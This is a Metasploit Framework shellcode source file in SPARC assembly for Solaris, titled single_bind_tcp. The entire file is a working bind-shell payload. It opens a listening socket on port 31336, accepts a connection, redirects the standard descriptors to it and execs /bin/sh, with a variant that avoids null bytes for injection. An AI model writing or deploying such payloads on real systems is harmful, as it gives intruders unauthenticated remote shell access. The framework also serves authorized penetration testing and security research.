1
##
2
#
3
#        Name: single_bind_tcp
4
#   Platforms: Solaris
5
#     Authors: vlad902 <vlad902 [at] gmail.com>
6
#     Version: $Revision: 1666 $
7
#     License:
8
#
9
#        This file is part of the Metasploit Exploit Framework
10
#        and is subject to the same licenses and copyrights as
11
#        the rest of this package.
12
#
13
# Description:
14
#
15
#        Single bind TCP shell.
16
#
17
##
18

19
.globl main
20

21
main:
22
	andn	%sp, 7, %sp
23

24
	mov	1, %o4
25
	xor	%o3, %o3, %o3
26
	xor	%o3, %o3, %o2
27
	mov	0x02, %o1
28
	mov	0x02, %o0
29
	mov	0xe6, %g1
30
	ta	0x08
31

32
	st	%o0, [ %sp - 0x08 ]
33

34
#ifndef NO_NULLS
35
	set	0x00027a68, %l0
36
#else
37
	set	0x27a68fff, %l0
38
	srl	%l0, 12, %l0
39
#endif
40
	st	%l0, [ %sp - 0x10 ]
41
	st	%g0, [ %sp - 0x0c ]
42
	sub	%sp, 16, %o1
43
	mov	0x10, %o2
44
	mov	0xe8, %g1
45
	ta	0x08
46

47
	ld	[ %sp - 0x08 ], %o0
48
	mov	0x01, %o1
49
	mov	0xe9, %g1
50
	ta	0x08
51

52
	ld	[ %sp - 0x08 ], %o0
53
	xor	%o1, %o1, %o1
54
	or	%o1, %o1, %o2
55
	mov	0xea, %g1
56
	ta	0x08
57

58
	st	%o0, [ %sp - 0x08 ]
59
	mov	3, %o2
60
fcntl_loop:
61
	mov	9, %o1
62
	subcc	%o2, 1, %o2
63
	mov	0x3e, %g1
64
	ta	0x08
65

66
	bnz	fcntl_loop
67
	ld	[ %sp - 0x08 ], %o0
68

69
	xor	%o3, %o3, %o2
70
	set	0x2f62696e, %l0
71
	set	0x2f736800, %l1
72
	sub	%sp, 0x10, %o0
73
	sub	%sp, 0x08, %o1
74
	std	%l0, [ %sp - 0x10 ]	
75
	st	%o0, [ %sp - 0x08 ]
76
	st	%g0, [ %sp - 0x04 ]
77
	mov	0x3b, %g1
78
	ta	0x08
79

80